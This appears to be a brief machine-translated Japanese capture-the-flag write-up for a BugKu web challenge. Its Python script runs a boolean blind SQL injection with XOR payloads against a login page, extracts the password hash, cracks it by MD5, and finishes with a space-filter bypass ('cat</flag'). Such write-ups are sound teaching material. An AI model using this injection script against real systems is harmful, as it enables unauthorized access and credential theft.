0. Webページを開き、タイトルの説明を表示します
説明:それはすべて絶望を取り除きますか?
説明によると、説明はブラインドです
1. Pythonスクリプトを作成し、実行してパスワードを取得します
import requests
session = requests.Session()
url="http://114.67.246.176:15649//login.php"
flag=''
for i in range(1,250):
left=32
right=128
mid=(left+right)//2
while(left<right):
payload="admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"%(i,mid)
data = {'uname': payload, 'passwd': 'admin'}
res = requests.post(url, data=data)
if 'password' in res.text:
left=mid+1
else:
right=mid
mid=(left+right)//2
if(mid==32 or mid==127):
break
flag=flag+chr(mid)
print(flag)
2.md5復号化を実行します
パスワードを取得します:bugkuctf
3. Webページにログインし、cat </ flagを使用してフラグを照会します(スペースはフィルタリングされます)
